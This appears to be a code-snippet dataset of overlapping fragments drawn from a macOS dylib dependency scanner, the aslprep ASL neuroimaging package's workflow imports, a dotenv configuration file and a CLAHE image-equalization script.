"target], encoding=\"utf-8\" ).splitlines(): line = line.strip() if line == \"cmd LC_LOAD_DYLIB\": in_load_dylib =",
"return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private)",
"= False libraries = set() for line in subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\"",
"threading.Event() def _check(self, job): if all(j.done() for j in self.jobs): self.all_done.set() def _enqueue(self,",
"import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private: bool): self.executor = executor",
"line in subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines(): line = line.strip() if line",
"ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private: bool): self.executor = executor self.libraries",
"= words[1] libraries.add(lib) in_load_dylib = False return libraries def smells_private(lib): if lib.startswith(\"/System/Library\"): return",
"for lib in libraries if not smells_private(lib)} for (target, libraries) in scanned_libraries.items() if",
"in self.scanned: is_private = smells_private(lib) if (is_private and self.scan_private) or not is_private: self._enqueue(lib)",
"[\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines(): line = line.strip() if line == \"cmd LC_LOAD_DYLIB\":"
] |
[
"\"\"\" Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule::",
"automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule::",
"from .gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from",
"import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, )",
"import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import",
"set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL - ASL signal workflows",
"'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf', 'init_cbfqc_compt_wf',",
"init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__",
"sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ..",
"init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf",
"(init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf',",
"Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc",
"init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf ) from .cbf import (",
".. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import",
"'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf', 'init_cbfqc_compt_wf', 'init_cbfplot_wf',",
".registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf,",
"py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et:",
"import init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import (",
"( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf ) from .cbf",
"automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule::",
".t2s import init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import",
"init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf)",
"ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^",
"python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4",
"# vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL - ASL",
".. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s ..",
"aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\" from .base",
"from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf,",
"from .t2s import init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling",
"from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf',",
".ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf',",
"( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf,",
"vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL - ASL signal",
"from .confounds import ( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf,",
"aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from",
"import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import",
"aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds",
"emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python",
"from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from",
"( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from",
"init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf,",
"automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\" from",
"init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [",
".base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc",
"init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from",
"init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf',",
"import ( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf,",
"aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration",
"aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling",
".. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds ..",
"from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils",
"'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf',",
") from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import (",
"aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf",
"aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf",
"'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf',",
"automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule::",
"'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf',",
".. automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from",
".stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf,",
"workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule::",
"init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf,",
".. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\"",
"import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf ) from",
"'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf', 'init_cbfqc_compt_wf', 'init_cbfplot_wf', 'init_cbfroiquant_wf', 'init_cbfgeqc_compt_wf' ]",
"\"\"\" from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf",
"__all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf',",
"automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf",
".cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import",
"sw=4 et: \"\"\" Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base",
"init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import",
"-*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4",
"from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf",
"automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from .gecbf import",
") from .confounds import ( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf,",
".. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from .gecbf",
"import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, )",
"mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4",
"init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf',",
"[ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf',",
"( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf,",
"init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf",
"'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf',",
"- ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule::",
"from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf,",
"init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf',",
"-*- # vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL -",
".hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration",
"4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\"",
"signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc ..",
"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s",
"ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc ..",
".gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s",
"from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from",
"'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf', 'init_cbfqc_compt_wf', 'init_cbfplot_wf', 'init_cbfroiquant_wf',",
"automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule::",
".. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration ..",
".confounds import ( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf,",
"import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import",
"init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf',",
"aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc import",
"ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc",
"import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf',",
"init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf',",
".resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf )",
"import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf,",
"ts=4 sw=4 et: \"\"\" Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule::",
"init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds",
"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set",
"indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing",
".. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling ..",
"init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ =",
"init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf)",
"automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc",
"init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import (",
") from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from",
"= [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf',",
"nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL",
"'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf', 'init_cbfqc_compt_wf', 'init_cbfplot_wf', 'init_cbfroiquant_wf', 'init_cbfgeqc_compt_wf'",
"et: \"\"\" Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base ..",
"init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf ) from .cbf import"
] |
[
"from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN', default=5,",
"find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN', default=5, cast=int) EVENT_INTERVAL = config('EVENT_INTERVAL',",
"-*- coding: utf-8 -*- from decouple import config from dotenv import load_dotenv, find_dotenv",
"import config from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN =",
"dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN', default=5, cast=int)",
"from decouple import config from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True))",
"import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN', default=5, cast=int) EVENT_INTERVAL",
"# -*- coding: utf-8 -*- from decouple import config from dotenv import load_dotenv,",
"utf-8 -*- from decouple import config from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True))",
"<gh_stars>0 # -*- coding: utf-8 -*- from decouple import config from dotenv import",
"config from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN',",
"load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN', default=5, cast=int) EVENT_INTERVAL = config('EVENT_INTERVAL', default=1,",
"load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN', default=5, cast=int) EVENT_INTERVAL =",
"-*- from decouple import config from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env',",
"usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN', default=5, cast=int) EVENT_INTERVAL = config('EVENT_INTERVAL', default=1, cast=int)",
"coding: utf-8 -*- from decouple import config from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env',",
"decouple import config from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN"
] |
[
"= im[..., 0] im = im.astype(np.float) # normalize to [0,1] im /= 255.",
"import Image from skimage.exposure import equalize_adapthist import os from matplotlib import pyplot as",
"os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(\".png\"): im =",
"from matplotlib import pyplot as plt parent = '/data/Kaggle' folders = [ 'pos-all-png',",
"2019 @author: tjb129 \"\"\" import numpy as np from PIL import Image from",
"np from PIL import Image from skimage.exposure import equalize_adapthist import os from matplotlib",
"save_dir = dir_i + '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i):",
"Aug 21 14:21:03 2019 @author: tjb129 \"\"\" import numpy as np from PIL",
"PIL import Image from skimage.exposure import equalize_adapthist import os from matplotlib import pyplot",
"python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Aug 21 14:21:03",
"14:21:03 2019 @author: tjb129 \"\"\" import numpy as np from PIL import Image",
"@author: tjb129 \"\"\" import numpy as np from PIL import Image from skimage.exposure",
"= dir_i + '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i): fname",
"'-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i): fname = os.fsdecode(f) if",
"folders = [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in folders: dir_i",
"# -*- coding: utf-8 -*- \"\"\" Created on Wed Aug 21 14:21:03 2019",
"fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2: im = im[..., 0]",
"equalize_adapthist import os from matplotlib import pyplot as plt parent = '/data/Kaggle' folders",
"[ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in folders: dir_i = os.path.join(parent,",
"/= 255. im = equalize_adapthist(im) im = np.uint8(im*255) im2 = Image.fromarray(im) im2.save(os.path.join(save_dir, fname))",
"import equalize_adapthist import os from matplotlib import pyplot as plt parent = '/data/Kaggle'",
"[0,1] im /= 255. im = equalize_adapthist(im) im = np.uint8(im*255) im2 = Image.fromarray(im)",
"dir_i) save_dir = dir_i + '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for f in",
"im = im.astype(np.float) # normalize to [0,1] im /= 255. im = equalize_adapthist(im)",
"if not os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(\".png\"):",
"= os.fsdecode(f) if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2: im",
